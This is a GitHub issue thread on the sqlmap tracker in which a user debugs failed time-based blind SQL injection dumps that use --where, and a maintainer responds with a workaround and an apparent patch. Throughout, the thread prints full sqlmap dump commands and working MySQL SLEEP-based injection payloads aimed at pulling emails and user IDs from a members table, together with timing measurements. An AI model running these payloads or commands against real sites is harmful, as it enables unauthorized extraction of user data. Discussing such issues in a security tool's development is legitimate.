### ISSUE TITLE
problem with --where dumping data

### ISSUE THREAD

**Issue by oddissue** [sqlmapproject/sqlmap#1636]
There's a very odd problem I'm having in sqlmap where, if I run:
`sqlmap.py -u "http://example.com/?id=2" -p "id" -D example -T members -C email --where="uid=5" --dump`

the email is dumped/extracted, let's say it is example@example.com in this example.

Now if I want to work backwards and find the uid of the email, we would run:
`sqlmap.py -u "http://example.com/?id=2" -p "id" -D example -T members -C uid --where="email='example@example.com'" --dump`

or:

`sqlmap.py -u "http://example.com/?id=2" -p "id" -D example -T members -C uid --where="email=0x6578616d706c65406578616d706c652e636f6d" --dump`

In which case, the payloads used are:

`[PAYLOAD] 2 AND (SELECT * FROM (SELECT(SLEEP(1-(IF(ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM example.members WHERE email=0x6578616d706c65406578616d706c652e636f6d),1,1))>54,0,1)))))MTAX)%23`

`[PAYLOAD] 2 AND (SELECT * FROM (SELECT(SLEEP(1-(IF(ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM example.members WHERE email=0x6578616d706c65406578616d706c652e636f6d),1,1))>57,0,1)))))MTAX)%23`

Where it then fails:

`[INFO] retrieved:`
`[DEBUG] performed 4 queries in 25.58 seconds`
`[WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'`
`[WARNING] unable to retrieve the number of column(s) 'uid' entries for table 'members' in database 'example'`

I have tried, both --hex and --no-cast, but nothing works.

The payload when I use `sqlmap.py -u "http://example.com/?id=2" -p "id" -D example -T members -C email --where="uid=5" --dump` (which works) is :

`2 AND (SELECT * FROM (SELECT(SLEEP(1-(IF(ORD(MID((SELECT COUNT(*) FROM example.members WHERE uid=2),1,1))>48,0,1)))))qrgM)%23`

Also, the --time-sec=1 is no issue, i have also tried it with --time-sec=5 but there is no difference, it still fails to work backwards to get the uid from the email.

Any ideas what the issue is?

thanks !

**Comment by oddissue** [comment]
Ok, so after further testing I've finally uncovered what the issue is, it is pretty complicated.

To first explain, when sqlmap does tests to the URL, without issuing any mysql commands, the response from the server is around 0.350 milliseconds (consistent)
If we run, and sleep(1) the response will be 1.200 milliseconds.
If we run, and sleep(2) the response will be 2.200 milliseconds.

Now in regards to my response results and queries run, the format is as such:

<query>

`1:`-> first request
`2:`-> second request

next to them, it has the seconds it took for the server to respond in seconds.
Query `A` is the one sqlmap is having issues with, query `B` is the one that works flawlessly with sqlmap.

-----------------------------------------------------------------------------------------------------------------------
A)

sqlmap syntax to produce query:

`sqlmap.py -u "http://www.example.com/?id=2" -p "id" -D example -T members -C uid --where="email='example@example.com'" --dump`

False query (it is not equal to 55) :

`2 AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM example.members WHERE email=0x6578616d706c65406578616d706c652e636f6d),1,1))=55,0,2)))))mwRa)%23`

Response times:

1: 5.4
2: 3.7
3: 3.7
4: 3.7
5: 3.7

True query (it is equal to 49) :

`2 AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM example.members WHERE email=0x6578616d706c65406578616d706c652e636f6d),1,1))=49,0,2)))))mwRa)%23`

Response times:

1:9.745
2:9.741
3:9.604
4:9.739
5:9.711

--------------------------------------------------------------------------------------------------------------------------

B)

sqlmap syntax to produce query:

`sqlmap.py -u "http://www.example.com/?id=2" -p "id" -D example -T members -C email --where="uid=1" --dump`

False query (it is not equal to 55) :


`2 AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM example.members WHERE uid=1),1,1))=55,0,2)))))clnX)%23`

Response times:

1: 0.343
2: 0.374
3: 0.359
4: 0.359
5: 0.343

True query (it is equal to 49) :

`2 AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM example.members WHERE uid=1),1,1))=49,0,2)))))clnX)%23`

Response times:

1:6.357
2:6.353
3:6.362
4:6.369
5:6.369









So, as you can see, when we put the email in the --where part of the sqlmap syntax, or any other column we're referring to that contains characters other than numeric ones, the response times increase by a lot.
I also realized that, if, we change on query B, the --time-sec to even 9 for example, and the query is FALSE, e.g we run:

`2 AND (SELECT * FROM (SELECT(SLEEP(9-(IF(ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM example.members WHERE uid=1),1,1))=55,0,9)))))clnX)%23`

The response times, are consistent to around 0.350, in other words, no matter what the sleep value is; if the query itself is false, the response from the server will always be something around 0.350.


However, that is not the same case with Query A, on Query A, even if the query itself is false, the time taken for it to respond depends on the value of the SLEEP value.
To further explain, the time taken for the server to respond to us will always be longer when the query is true than it is when it is false, but both of the response times, (true and false) will increase somewhat proportionally depending on what the SLEEP value is (contrary to query B, where no matter what SLEEP value we have, if the query itself is false, the response from the server is always around 0.350).


That is the deepest analysis I could do of the problem.
If I could somehow, configure sqlmap to deal with this inexplicable behavior of the server, I would really appreciate it for someone to show me how.

I do not even know how to explain why the server behaves the way it does, it is just so odd, there is obviously something going on in the background, I just cannot pinpoint exactly what, I am 100% certain there is no WAF involved at all.

Thanks !

**Comment by oddissue** [comment]
Basically, what needs to be achieved here is:

We need to find a way, to make sqlmap think the normal server response is 3.7 seconds, where in reality, it is 0.350.

**Comment by oddissue** [comment]
I tried a few tricks with sqlmap, but nothing worked.
If we can make sqlmap think the normal server response is 3.7 seconds, which is equal to the server response when the query if false with query A, we can successfully extract data.

**Comment by oddissue** [comment]
I tried this:

`sqlmap.py -u "http://example.com/?id=2* and sleep(3)%23" -p "id" -D example -T members -C uid --prefix="" --suffix="%23" where="email='example@example.com'" --dump `

Which makes sqlmap, for some period of time think the normal server response is 3.7 seconds.
But then, instead of going forward as it usually does, without the 'and sleep(3)' appended to the parameter, it tries to test if it's actually vulnerable afterall, where it then tries things like:

`and sleep(2)`, which transforms the request to:

`http://example.com/?id=2 and sleep(2)%23and sleep(3)%23` which just further confuses sqlmap.

Do you have any ideas how I can make sqlmap think the normal server response is 3.7 and make it go forward with the injection? Because if it does so, it will be able to extract data successfully since the normal server response now will match the time taken for the false query in query A.

**Comment by stamparm** [comment]
I see. The problem is that this is too specific. The easiest for me is to just turn off `--where` in case of time-based SQLi. Otherwise, there would be a requirement for "statistic" collection of "normal" responses for all datatable dumps in case of `--where`. Not sure if this is worth it.

**Comment by hadar200014** [comment]
I join to the question..
In my case it is Microsoft sql server , but when I tried to dump a table, sqlmap showing me this:

[18:01:50] [INFO] retrieved: 
[18:01:50] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[18:01:50] [INFO] retrieved: 
[18:01:51] [INFO] fetching entries for table 'Users' in database 'DB'
[18:01:51] [INFO] fetching number of entries for table 'Users' in database 'DB'
[18:01:51] [INFO] retrieved: 
[18:01:51] [WARNING] unable to retrieve the number of entries for table 'Users' in database 'DB'
[18:01:51] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 4 times
[18:01:51] [INFO] fetched data logged to text files under '/root/.sqlmap/output/SITE.COM

I am sorry about my english

**Comment by stamparm** [comment]
@oddissue "Do you have any ideas how I can make sqlmap think the normal server response is 3.7 and make it go forward with the injection?" <- you can try something like `--delay 3.35` (this will add additional delay to the existing latency)

**Comment by stamparm** [comment]
@hadar200014 you have too generic issue. I would say permission problem or non-existing table

**Comment by oddissue** [comment]
@stamparm Nope. That doesn't work and from my understanding, --delay just delays the time between each http request, it has nothing to do with the time that it takes for the server to respond, which is what we have to try and 'spoof' here (make sqlmap think it's 3.7 seconds when it's actually 0.350 seconds).

**Comment by oddissue** [comment]
@stamparm I also made a donation:
https://blockchain.info/address/1AUrrKYsamBEThdruYTQmUfMfLF7aaxU6x
https://blockchain.info/tx/59466a6a5fc7c630af6bb2edb47a074a5ce0f74b58ae780156367c785807d706

In regards to this issue, it would make sense for it to take longer as well if you think about it, as it will obviously take more time to run heavier and more complex queries and as such, you cannot always expect the time taken for the server to respond when the query is false to be always, close or equal to the time taken for the server to respond when there is absolutely no query (0.350) in this case.
I'm sure, other people have had such issues in the past, but it was just masked as probable permission errors or WAF issues and then just closed and disregarded as they did not do a deep enough analysis of the root cause of the problem, which I did.

So, if you think about it in that regard, this is a very likely problem to be encountered and as such it should be fixed.

I suggest, instead of making it default behavior, we could run something like e.g :
`--static-analysis` when sqlmap is having issues dumping data with the --where option when we are dealing with time based sql injections.

So the way that will work is, instead of collecting the normal server responses when there is no query and then making the assumption, that, that time will be equal to absolutely any false sql query (as it is doing now), we can instead:

Run certain false SQL Queries, let's take my `A` example as such (there is no way it can be equal to 99999999)

`2 AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM example.members WHERE email=0x6578616d706c65406578616d706c652e636f6d),1,1))=99999999,0,2)))))mwRa)%23`

and collect the response from the server, 35-45 times and take the average of those times (in my cause it is 3.7 with that specific query).


The average of those times, is what we can now use to extract the necessary data because:

Now sqlmap can tell the difference between the time taken for the server to respond when:

A) The query is true (it will take significantly longer than when the query is false).
B) The query is false (it will be significantly faster than when the query is true).


That is just my suggestion, I'm sure there are smarter ways to go about this, but this is just one way.

If this feature could be solved today I wouldn't have any problems sending double of my initial donation.

Keep up the good work guys !

**Comment by stamparm** [comment]
@oddissue thank you for donation :)

as of "patching", now I have a child's birthday to attend, so I am not sure that I can make it in such short time. I've already looked and the patch is not trivial.

As of "I'm sure, other people have had such issues in the past, but it was just masked as probable permission errors or WAF issues and then just closed and disregarded as they did not do a deep enough analysis of the root cause of the problem, which I did." <- I am glad that there are users like you that can find the cause of problem and report back. Otherwise, its really impossible to cope with problems like this.

p.s. I don't promise the patch as from current point of view it looks like the code base could be messed with "junk". I have a place or two where this could be "squeezed", but I really prefer clean code

**Comment by oddissue** [comment]
@stamparm Hi, "as of "patching", now I have a child's birthday to attend, so I am not sure that I can make it in such short time. I've already looked and the patch is not trivial." understood.

**Comment by oddissue** [comment]
@stamparm I sent an email to miroslav@sqlmap.org , please have a look at it when you have time. Thanks.

**Comment by oddissue** [comment]
@stamparm The patch has solved half of the problem.
It now detects the number of results where a member has email example@example.com by getting the time for the server to respond to false queries such as:

`AND (SELECT * FROM (SELECT(SLEEP(1-(IF(ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM example.members WHERE email=0x6578616d706c65406578616d706c652e636f6d),1,1))>654220,0,1)))))dwbn)%23`


Once it has received the correct number, it now goes to the part where it extracts the uid itself of the member where the email is example@example.com with the following query:

`AND (SELECT * FROM (SELECT(SLEEP(1-(IF(ORD(MID((SELECT IFNULL(CAST(uid AS CHAR),0x20) FROM example.members WHERE email=0x6578616d706c65406578616d706c652e636f6d ORDER BY uid LIMIT 0,1),1,1))>64,0,1)))))NIPc)%23`

The problem now is, the time that it took for the server to respond with the first false query, namely:
`AND (SELECT * FROM (SELECT(SLEEP(1-(IF(ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM example.members WHERE email=0x6578616d706c65406578616d706c652e636f6d),1,1))>654220,0,1)))))dwbn)%23`

took an average of 3.7 seconds, where as, with the new query where it goes to extract the uid of the member with email example@example.com, the false query:

`AND (SELECT * FROM (SELECT(SLEEP(1-(IF(ORD(MID((SELECT IFNULL(CAST(uid AS CHAR),0x20) FROM example.members WHERE email=0x6578616d706c65406578616d706c652e636f6d ORDER BY uid LIMIT 0,1),1,1))>99999,0,1)))))NIPc)%23`

Is now equal to the normal server response, which is 0.350 milliseconds.


So in summary, the only extra thing that needs to be done here is:

To collect the times that it takes for the server to respond with false queries, each time that the query itself changes (so in my case, it would have to collect the time taken for the server to respond to false queries, two separate times as there were 2 different queries).

Because here, it got the first part of the timing correct (3.7 seconds for false query) and as such it was able to extract that there was 1 record with email example@example.com, but it made the assumption that the time taken for the server to respond to this false query (which took 0.350 seconds) :

`AND (SELECT * FROM (SELECT(SLEEP(1-(IF(ORD(MID((SELECT IFNULL(CAST(uid AS CHAR),0x20) FROM example.members WHERE email=0x6578616d706c65406578616d706c652e636f6d ORDER BY uid LIMIT 0,1),1,1))>99999,0,1)))))NIPc)%23`

would be equal to the time taken by the server to respond to this false query (which took an average of 3.7 seconds) :

`AND (SELECT * FROM (SELECT(SLEEP(1-(IF(ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM example.members WHERE email=0x6578616d706c65406578616d706c652e636f6d),1,1))>654220,0,1)))))dwbn)%23`


It just needs to time each different query separately and it will work flawlessly.

thanks.
